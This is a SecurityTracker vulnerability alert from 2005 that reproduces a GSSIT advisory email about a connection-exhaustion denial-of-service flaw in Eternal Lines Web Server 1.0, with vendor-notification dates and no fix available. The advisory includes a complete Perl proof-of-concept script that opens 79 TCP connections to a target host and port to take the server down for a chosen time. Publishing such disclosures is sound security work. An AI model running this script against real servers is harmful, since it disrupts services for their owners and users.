Eternal Lines Web Server Lets Remote Users Deny Service With Multiple Simultaneous Connections
|
|
SecurityTracker Alert ID: 1013046
|
|
SecurityTracker URL: http://securitytracker.com/id?1013046
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 31 2005
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Advisory: Global Security Solution IT (GSSIT)
|
Version(s): 1.0
|
Description: Ziv Kamir of Global Security Solution IT reported a vulnerability in Eternal Lines Web Server. A remote user can cause denial of service conditions.
A remote user can open approximately 70 simultaneous connections to the target web server from the same originating host to cause the target web server to stop accepting connections.
The vendor was notified on January 26, 2005.
|
Impact: A remote user can cause the target web server to stop accepting connections.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.eternallines.com/webserver/index.html (Links to External Site)
|
Cause: State error
|
Underlying OS: Windows (Any)
|
Reported By: GSS IT <gss_it@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 31 Jan 2005 02:44:34 -0800 (PST)
From: GSS IT <gss_it@yahoo.com>
Subject: Eternal Lines Web Server Ver 1.0
|
--0-1834178254-1107168274=:81573
Content-Type: multipart/alternative; boundary="0-1729700457-1107168274=:81573"
--0-1729700457-1107168274=:81573
Content-Type: text/plain; charset=us-ascii
---------------------------------
Do you Yahoo!?
Meet the all-new My Yahoo! – Try it today!
--0-1729700457-1107168274=:81573
Content-Type: text/html; charset=us-ascii
<p>
<hr size=1>Do you Yahoo!?<br>
Meet the <a href="http://my.yahoo.com">all-new My Yahoo!</a> – Try it today!
--0-1729700457-1107168274=:81573--
--0-1834178254-1107168274=:81573
Content-Type: text/plain; name="EL_Web.txt"
Content-Description: EL_Web.txt
Content-Disposition: inline; filename="EL_Web.txt"
31/01/05
====================================
GSSIT - Global Security Solution IT
====================================
-------------------------------------------------------
Application: Eternal Lines Web Server
Web Site: www.eternallines.com
Versions: 1.0
Platform: Windows
Credits:
########
#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# WEB : www.gssit.co.il #
# #
# #
#########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
================
1) Introduction
================
Eternal Lines Web Server is a free Web Server for use with Windows.
Features:
HTTP/1.0 and HTTP/1.1 compliant
Support CGI/1.1 executables
Bandwidth limits
=======
2) Bug
=======
A remote user can open approximately 70 simultaneous connections from the same host
to cause the target web server to stop accepting connections.
===========
3) The Code
===========
#####################################################################################################
##
#!/usr/bin/perl
##############################################################
# GSS-IT Research And Security Labs #
##############################################################
# #
# www.gssit.co.il #
# #
##############################################################
# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #
##############################################################
use Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$slp = $ARGV[2];
$proto = getprotobyname('tcp');
if (($#ARGV) < 2)
{
print("##########################################################\n");
print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #\n");
print("##########################################################\n\n");
print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n");
exit
}
print("##########################################################\n");
print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #\n");
print("##########################################################\n");
for ($i=1; $i<80; $i++)
{
socket($i, PF_INET, SOCK_STREAM, $proto );
$dest = sockaddr_in ($port, inet_aton($host));
if (!(connect($i, $dest)))
{
Slp();
}
}
print("==> Unsuccesful <==");
exit;
sub Slp
{
print("\n\nServer $host Has Been Successfully DoS'ed\n\n");
print("The Server Will Be Down For $slp Seconds\n\n");
sleep ($slp);
print("==> Killing Connections ...<==\n");
for ($j=1; $j<80; $j++)
{
shutdown($j,2);
}
print ("[#] Back To Work Server Up [#] ");
exit;
}
#####################################################################################################
##
======
4) Fix
======
Date of Vendor Notification:
----------------------------
26/01/05
Response :
=========
No Response.
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without
warranty of any kind. In no event shall we be liable for any
damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.
==============================================================================================
--0-1834178254-1107168274=:81573--
|
|
